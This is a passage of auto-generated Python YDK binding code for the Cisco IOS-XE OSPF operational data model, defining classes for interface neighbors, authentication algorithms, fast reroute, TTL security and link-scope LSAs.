**config**\: False
.. attribute:: intf_link_scope_lsas
List OSPF link scope LSAs
**type**\: list of :py:class:`IntfLinkScopeLsas <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas>`
**config**\: False
.. attribute:: intf_multi_topology
OSPF interface topology
**type**\: list of :py:class:`IntfMultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology>`
**config**\: False
.. attribute:: priority
Configure OSPF router priority
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, self).__init__()
self.yang_name = "ospf-interface"
self.yang_parent_name = "ospf-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([("multi-area", ("multi_area", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea)), ("static-neighbor", ("static_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor)), ("fast-reroute", ("fast_reroute", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute)), ("ttl-security", ("ttl_security", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity)), ("authentication", ("authentication", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication)), ("ospf-neighbor", ("ospf_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor)), ("intf-link-scope-lsas", ("intf_link_scope_lsas", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas)), ("intf-multi-topology", ("intf_multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology))])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])),
('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])),
('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])),
('node_flag', (YLeaf(YType.boolean, 'node-flag'), ['bool'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])),
('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])),
('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])),
('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])),
('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])),
('lls', (YLeaf(YType.boolean, 'lls'), ['bool'])),
('prefix_suppression', (YLeaf(YType.boolean, 'prefix-suppression'), ['bool'])),
('bfd', (YLeaf(YType.boolean, 'bfd'), ['bool'])),
('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
('state', (YLeaf(YType.str, 'state'), ['str'])),
('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])),
('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])),
('dr', (YLeaf(YType.str, 'dr'), ['str','str'])),
('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])),
('priority', (YLeaf(YType.uint8, 'priority'), ['int'])),
])
self.name = None
self.network_type = None
self.passive = None
self.demand_circuit = None
self.node_flag = None
self.cost = None
self.hello_interval = None
self.dead_interval = None
self.retransmit_interval = None
self.transmit_delay = None
self.mtu_ignore = None
self.lls = None
self.prefix_suppression = None
self.bfd = None
self.enable = None
self.state = None
self.hello_timer = None
self.wait_timer = None
self.dr = None
self.bdr = None
self.priority = None
self.multi_area = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea()
self.multi_area.parent = self
self._children_name_map["multi_area"] = "multi-area"
self.fast_reroute = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute()
self.fast_reroute.parent = self
self._children_name_map["fast_reroute"] = "fast-reroute"
self.ttl_security = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity()
self.ttl_security.parent = self
self._children_name_map["ttl_security"] = "ttl-security"
self.authentication = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication()
self.authentication.parent = self
self._children_name_map["authentication"] = "authentication"
self.static_neighbor = YList(self)
self.ospf_neighbor = YList(self)
self.intf_link_scope_lsas = YList(self)
self.intf_multi_topology = YList(self)
self._segment_path = lambda: "ospf-interface" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, ['name', 'network_type', 'passive', 'demand_circuit', 'node_flag', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'mtu_ignore', 'lls', 'prefix_suppression', 'bfd', 'enable', 'state', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'priority'], name, value)
class MultiArea(Entity):
"""
Multi Area
.. attribute:: multi_area_id
Multi\-area ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cost
Interface cost for multi\-area
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, self).__init__()
self.yang_name = "multi-area"
self.yang_parent_name = "ospf-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('multi_area_id', (YLeaf(YType.uint32, 'multi-area-id'), ['int'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
])
self.multi_area_id = None
self.cost = None
self._segment_path = lambda: "multi-area"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea, ['multi_area_id', 'cost'], name, value)
                    class StaticNeighbor(Entity):
                        """
                        Statically configured neighbors
                        .. attribute:: address (key)
                            Neighbor IP address
                            **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                            **config**\: False
                        .. attribute:: cost
                            Neighbor cost
                            **type**\: int
                            **range:** 0..65535
                            **config**\: False
                        .. attribute:: poll_interval
                            Neighbor polling interval in seconds
                            **type**\: int
                            **range:** 0..65535
                            **config**\: False
                            **units**\: seconds
                        """
                        # YANG module prefix and revision this class was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, self).__init__()
                            # YANG statement name and the parent statement it hangs under.
                            self.yang_name = "static-neighbor"
                            self.yang_parent_name = "ospf-interface"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            # YANG list key leaf(s); used in the keyed segment path below.
                            self.ylist_key_names = ['address']
                            self._child_classes = OrderedDict([])  # leaf-only node: no child containers
                            # Leaf metadata: python attribute -> (YLeaf(type, yang-name), accepted python type names).
                            self._leafs = OrderedDict([
                                ('address', (YLeaf(YType.str, 'address'), ['str','str'])),
                                ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
                                ('poll_interval', (YLeaf(YType.uint16, 'poll-interval'), ['int'])),
                            ])
                            self.address = None
                            self.cost = None
                            self.poll_interval = None
                            # Relative data path segment, keyed by the 'address' list key.
                            self._segment_path = lambda: "static-neighbor" + "[address='" + str(self.address) + "']"
                            self._is_frozen = True  # framework flag; set last, after all fields exist
                        def __setattr__(self, name, value):
                            # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor, ['address', 'cost', 'poll_interval'], name, value)
                    class FastReroute(Entity):
                        """
                        Fast reroute config
                        .. attribute:: candidate_disabled
                            Prevent the interface to be used as backup
                            **type**\: bool
                            **config**\: False
                        .. attribute:: enabled
                            Activates LFA. This model assumes activation of per\-prefix LFA
                            **type**\: bool
                            **config**\: False
                        .. attribute:: remote_lfa_enabled
                            Activates remote LFA
                            **type**\: bool
                            **config**\: False
                        """
                        # YANG module prefix and revision this class was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, self).__init__()
                            # YANG statement name and the parent statement it hangs under.
                            self.yang_name = "fast-reroute"
                            self.yang_parent_name = "ospf-interface"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []  # container, not a list: no keys
                            self._child_classes = OrderedDict([])  # leaf-only node: no child containers
                            # Leaf metadata: python attribute -> (YLeaf(type, yang-name), accepted python type names).
                            self._leafs = OrderedDict([
                                ('candidate_disabled', (YLeaf(YType.boolean, 'candidate-disabled'), ['bool'])),
                                ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
                                ('remote_lfa_enabled', (YLeaf(YType.boolean, 'remote-lfa-enabled'), ['bool'])),
                            ])
                            self.candidate_disabled = None
                            self.enabled = None
                            self.remote_lfa_enabled = None
                            self._segment_path = lambda: "fast-reroute"
                            self._is_frozen = True  # framework flag; set last, after all fields exist
                        def __setattr__(self, name, value):
                            # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute, ['candidate_disabled', 'enabled', 'remote_lfa_enabled'], name, value)
                    class TtlSecurity(Entity):
                        """
                        TTL security
                        .. attribute:: enabled
                            Enable/Disable TTL security check
                            **type**\: bool
                            **config**\: False
                        .. attribute:: hops
                            Maximum number of hops that a OSPF packet may have traveled
                            **type**\: int
                            **range:** 0..255
                            **config**\: False
                        """
                        # YANG module prefix and revision this class was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, self).__init__()
                            # YANG statement name and the parent statement it hangs under.
                            self.yang_name = "ttl-security"
                            self.yang_parent_name = "ospf-interface"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []  # container, not a list: no keys
                            self._child_classes = OrderedDict([])  # leaf-only node: no child containers
                            # Leaf metadata: python attribute -> (YLeaf(type, yang-name), accepted python type names).
                            self._leafs = OrderedDict([
                                ('enabled', (YLeaf(YType.boolean, 'enabled'), ['bool'])),
                                ('hops', (YLeaf(YType.uint8, 'hops'), ['int'])),
                            ])
                            self.enabled = None
                            self.hops = None
                            self._segment_path = lambda: "ttl-security"
                            self._is_frozen = True  # framework flag; set last, after all fields exist
                        def __setattr__(self, name, value):
                            # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity, ['enabled', 'hops'], name, value)
                    class Authentication(Entity):
                        """
                        Authentication configuration
                        .. attribute:: sa
                            SA name
                            **type**\: str
                            **config**\: False
                        .. attribute:: key_chain
                            key\-chain name
                            **type**\: str
                            **config**\: False
                        .. attribute:: key_string
                            Key string in ASCII format
                            **type**\: str
                            **config**\: False
                        .. attribute:: crypto_algorithm_val
                            Crypto algorithm
                            **type**\: :py:class:`CryptoAlgorithmVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal>`
                            **config**\: False
                        .. attribute:: no_auth
                            No authentication enabled
                            **type**\: int
                            **range:** 0..4294967295
                            **config**\: False
                        """
                        # YANG module prefix and revision this class was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, self).__init__()
                            # YANG statement name and the parent statement it hangs under.
                            self.yang_name = "authentication"
                            self.yang_parent_name = "ospf-interface"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []  # container, not a list: no keys
                            # Child container: yang-name -> (python attribute, generated class).
                            self._child_classes = OrderedDict([("crypto-algorithm-val", ("crypto_algorithm_val", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal))])
                            # Leaf metadata: python attribute -> (YLeaf(type, yang-name), accepted python type names).
                            self._leafs = OrderedDict([
                                ('sa', (YLeaf(YType.str, 'sa'), ['str'])),
                                ('key_chain', (YLeaf(YType.str, 'key-chain'), ['str'])),
                                ('key_string', (YLeaf(YType.str, 'key-string'), ['str'])),
                                ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])),
                            ])
                            self.sa = None
                            self.key_chain = None
                            self.key_string = None
                            self.no_auth = None
                            # Eagerly build the single child container and link it back to us.
                            self.crypto_algorithm_val = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal()
                            self.crypto_algorithm_val.parent = self
                            self._children_name_map["crypto_algorithm_val"] = "crypto-algorithm-val"
                            self._segment_path = lambda: "authentication"
                            self._is_frozen = True  # framework flag; set last, after all fields exist
                        def __setattr__(self, name, value):
                            # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication, ['sa', 'key_chain', 'key_string', 'no_auth'], name, value)
                        class CryptoAlgorithmVal(Entity):
                            """
                            Crypto algorithm. Each leaf is a YANG 'empty' presence flag:
                            its mere presence selects the algorithm.
                            .. attribute:: hmac_sha1_12
                                HMAC\-SHA1\-12 algorithm
                                **type**\: :py:class:`Empty<ydk.types.Empty>`
                                **config**\: False
                            .. attribute:: hmac_sha1_20
                                HMAC\-SHA1\-20 algorithm
                                **type**\: :py:class:`Empty<ydk.types.Empty>`
                                **config**\: False
                            .. attribute:: md5
                                MD5 algorithm
                                **type**\: :py:class:`Empty<ydk.types.Empty>`
                                **config**\: False
                            .. attribute:: sha_1
                                SHA\-1 algorithm
                                **type**\: :py:class:`Empty<ydk.types.Empty>`
                                **config**\: False
                            .. attribute:: hmac_sha_1
                                HMAC\-SHA\-1 authentication algorithm
                                **type**\: :py:class:`Empty<ydk.types.Empty>`
                                **config**\: False
                            .. attribute:: hmac_sha_256
                                HMAC\-SHA\-256 authentication algorithm
                                **type**\: :py:class:`Empty<ydk.types.Empty>`
                                **config**\: False
                            .. attribute:: hmac_sha_384
                                HMAC\-SHA\-384 authentication algorithm
                                **type**\: :py:class:`Empty<ydk.types.Empty>`
                                **config**\: False
                            .. attribute:: hmac_sha_512
                                HMAC\-SHA\-512 authentication algorithm
                                **type**\: :py:class:`Empty<ydk.types.Empty>`
                                **config**\: False
                            """
                            # YANG module prefix and revision this class was generated from.
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, self).__init__()
                                self.yang_name = "crypto-algorithm-val"
                                self.yang_parent_name = "authentication"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []  # container, not a list: no keys
                                self._child_classes = OrderedDict([])  # leaf-only node: no child containers
                                # All leaves are YANG 'empty' type presence markers.
                                self._leafs = OrderedDict([
                                    ('hmac_sha1_12', (YLeaf(YType.empty, 'hmac-sha1-12'), ['Empty'])),
                                    ('hmac_sha1_20', (YLeaf(YType.empty, 'hmac-sha1-20'), ['Empty'])),
                                    ('md5', (YLeaf(YType.empty, 'md5'), ['Empty'])),
                                    ('sha_1', (YLeaf(YType.empty, 'sha-1'), ['Empty'])),
                                    ('hmac_sha_1', (YLeaf(YType.empty, 'hmac-sha-1'), ['Empty'])),
                                    ('hmac_sha_256', (YLeaf(YType.empty, 'hmac-sha-256'), ['Empty'])),
                                    ('hmac_sha_384', (YLeaf(YType.empty, 'hmac-sha-384'), ['Empty'])),
                                    ('hmac_sha_512', (YLeaf(YType.empty, 'hmac-sha-512'), ['Empty'])),
                                ])
                                self.hmac_sha1_12 = None
                                self.hmac_sha1_20 = None
                                self.md5 = None
                                self.sha_1 = None
                                self.hmac_sha_1 = None
                                self.hmac_sha_256 = None
                                self.hmac_sha_384 = None
                                self.hmac_sha_512 = None
                                self._segment_path = lambda: "crypto-algorithm-val"
                                self._is_frozen = True  # framework flag; set last, after all fields exist
                            def __setattr__(self, name, value):
                                # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication.CryptoAlgorithmVal, ['hmac_sha1_12', 'hmac_sha1_20', 'md5', 'sha_1', 'hmac_sha_1', 'hmac_sha_256', 'hmac_sha_384', 'hmac_sha_512'], name, value)
                    class OspfNeighbor(Entity):
                        """
                        List of OSPF neighbors
                        .. attribute:: neighbor_id (key)
                            OSPF neighbor ID
                            **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                            **config**\: False
                        .. attribute:: address
                            Neighbor address
                            **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                            **config**\: False
                        .. attribute:: dr
                            Designated Router
                            **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                            **config**\: False
                        .. attribute:: bdr
                            Backup Designated Router
                            **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                            **config**\: False
                        .. attribute:: state
                            OSPF neighbor state
                            **type**\: :py:class:`NbrStateType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.NbrStateType>`
                            **config**\: False
                        .. attribute:: stats
                            Per\-neighbor statistics
                            **type**\: :py:class:`Stats <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats>`
                            **config**\: False
                        """
                        # YANG module prefix and revision this class was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, self).__init__()
                            # YANG statement name and the parent statement it hangs under.
                            self.yang_name = "ospf-neighbor"
                            self.yang_parent_name = "ospf-interface"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            # YANG list key leaf(s); used in the keyed segment path below.
                            self.ylist_key_names = ['neighbor_id']
                            # Child container: yang-name -> (python attribute, generated class).
                            self._child_classes = OrderedDict([("stats", ("stats", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats))])
                            # Leaf metadata: python attribute -> (YLeaf(type, yang-name), accepted python type names).
                            self._leafs = OrderedDict([
                                ('neighbor_id', (YLeaf(YType.str, 'neighbor-id'), ['str','str'])),
                                ('address', (YLeaf(YType.str, 'address'), ['str','str'])),
                                ('dr', (YLeaf(YType.str, 'dr'), ['str','str'])),
                                ('bdr', (YLeaf(YType.str, 'bdr'), ['str','str'])),
                                ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])),
                            ])
                            self.neighbor_id = None
                            self.address = None
                            self.dr = None
                            self.bdr = None
                            self.state = None
                            # Eagerly build the single child container and link it back to us.
                            self.stats = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats()
                            self.stats.parent = self
                            self._children_name_map["stats"] = "stats"
                            # Relative data path segment, keyed by the 'neighbor-id' list key.
                            self._segment_path = lambda: "ospf-neighbor" + "[neighbor-id='" + str(self.neighbor_id) + "']"
                            self._is_frozen = True  # framework flag; set last, after all fields exist
                        def __setattr__(self, name, value):
                            # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor, ['neighbor_id', 'address', 'dr', 'bdr', 'state'], name, value)
                        class Stats(Entity):
                            """
                            Per\-neighbor statistics
                            .. attribute:: nbr_event_count
                                The number of time this neighbor has changed state or an error has occurred
                                **type**\: int
                                **range:** 0..4294967295
                                **config**\: False
                            .. attribute:: nbr_retrans_qlen
                                The current length of the retransmission queue
                                **type**\: int
                                **range:** 0..4294967295
                                **config**\: False
                            """
                            # YANG module prefix and revision this class was generated from.
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, self).__init__()
                                self.yang_name = "stats"
                                self.yang_parent_name = "ospf-neighbor"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = []  # container, not a list: no keys
                                self._child_classes = OrderedDict([])  # leaf-only node: no child containers
                                self._leafs = OrderedDict([
                                    ('nbr_event_count', (YLeaf(YType.uint32, 'nbr-event-count'), ['int'])),
                                    ('nbr_retrans_qlen', (YLeaf(YType.uint32, 'nbr-retrans-qlen'), ['int'])),
                                ])
                                self.nbr_event_count = None
                                self.nbr_retrans_qlen = None
                                self._segment_path = lambda: "stats"
                                self._is_frozen = True  # framework flag; set last, after all fields exist
                            def __setattr__(self, name, value):
                                # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor.Stats, ['nbr_event_count', 'nbr_retrans_qlen'], name, value)
                    class IntfLinkScopeLsas(Entity):
                        """
                        List OSPF link scope LSAs
                        .. attribute:: lsa_type (key)
                            OSPF link scope LSA type
                            **type**\: int
                            **range:** 0..4294967295
                            **config**\: False
                        .. attribute:: link_scope_lsa
                            List of OSPF link scope LSAs
                            **type**\: list of :py:class:`LinkScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa>`
                            **config**\: False
                        .. attribute:: area_scope_lsa
                            List OSPF area scope LSA databases
                            **type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa>`
                            **config**\: False
                        """
                        # YANG module prefix and revision this class was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, self).__init__()
                            # YANG statement name and the parent statement it hangs under.
                            self.yang_name = "intf-link-scope-lsas"
                            self.yang_parent_name = "ospf-interface"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            # YANG list key leaf(s); used in the keyed segment path below.
                            self.ylist_key_names = ['lsa_type']
                            # Child YANG lists: yang-name -> (python attribute, generated class).
                            self._child_classes = OrderedDict([("link-scope-lsa", ("link_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa))])
                            self._leafs = OrderedDict([
                                ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
                            ])
                            self.lsa_type = None
                            # Ordered containers for the child list entries.
                            self.link_scope_lsa = YList(self)
                            self.area_scope_lsa = YList(self)
                            # Relative data path segment, keyed by the 'lsa-type' list key.
                            self._segment_path = lambda: "intf-link-scope-lsas" + "[lsa-type='" + str(self.lsa_type) + "']"
                            self._is_frozen = True  # framework flag; set last, after all fields exist
                        def __setattr__(self, name, value):
                            # Delegate writes to Entity._perform_setattr, restricting the writable leaf names.
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas, ['lsa_type'], name, value)
                        class LinkScopeLsa(Entity):
                            """
                            List of OSPF link scope LSAs
                            .. attribute:: lsa_id (key)
                                LSA ID
                                **type**\: int
                                **range:** 0..4294967295
                                **config**\: False
                            .. attribute:: adv_router (key)
                                Advertising router
                                **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                                **config**\: False
                            .. attribute:: decoded_completed
                                The OSPF LSA body is fully decoded
                                **type**\: bool
                                **config**\: False
                            .. attribute:: raw_data
                                The complete LSA in network byte order as received/sent over the wire
                                **type**\: list of int
                                **range:** 0..255
                                **config**\: False
                            .. attribute:: version
                                Version
                                **type**\: int
                                **range:** 0..4294967295
                                **config**\: False
                            .. attribute:: ospfv2_lsa
                                OSPFv2 LSA
                                **type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa>`
                                **config**\: False
                            .. attribute:: ospfv2_link
                                OSPFv2 LSA link
                                **type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link>`
                                **config**\: False
                            .. attribute:: ospfv2_topology
                                Summary LSA
                                **type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology>`
                                **config**\: False
                            .. attribute:: ospfv2_external
                                External LSA
                                **type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External>`
                                **config**\: False
                            .. attribute:: ospfv2_unknown_tlv
                                OSPFv2 Unknown TLV
                                **type**\: list of :py:class:`Ospfv2UnknownTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv>`
                                **config**\: False
                            .. attribute:: ospfv3_lsa_val
                                OSPFv3 LSA
                                **type**\: :py:class:`Ospfv3LsaVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal>`
                                **config**\: False
                            .. attribute:: ospfv3_link
                                OSPFv3 links
                                **type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link>`
                                **config**\: False
                            .. attribute:: ospfv3_prefix_list
                                OSPFv3 prefix\-list
                                **type**\: list of :py:class:`Ospfv3PrefixList <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList>`
                                **config**\: False
                            .. attribute:: ospfv3_ia_prefix
                                OSPFv3 intra\-area prefix\-list
                                **type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix>`
                                **config**\: False
                            .. attribute:: multi_topology
                                OSPF multi\-topology interface augmentation
                                **type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology>`
                                **config**\: False
                            .. attribute:: router_address
                                Router address
                                **type**\: str (IPv4 dotted\-quad or IPv6 address, optionally zone\-qualified)
                                **config**\: False
                            .. attribute:: tlv
                                Link TLV
                                **type**\: :py:class:`Tlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv>`
                                **config**\: False
                            .. attribute:: unknown_sub_tlv
                                OSPFv2 Unknown sub TLV
                                **type**\: list of :py:class:`UnknownSubTlv <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv>`
                                **config**\: False
                            """
                            # YANG module prefix and revision this class was generated from.
                            _prefix = 'ospf-ios-xe-oper'
                            _revision = '2018-02-01'
                            def __init__(self):
                                super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa, self).__init__()
                                # YANG statement name and the parent statement it hangs under.
                                self.yang_name = "link-scope-lsa"
                                self.yang_parent_name = "intf-link-scope-lsas"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                # Composite YANG list key: (lsa-id, adv-router); both appear in the segment path.
                                self.ylist_key_names = ['lsa_id','adv_router']
                                # Child containers/lists: yang-name -> (python attribute, generated class).
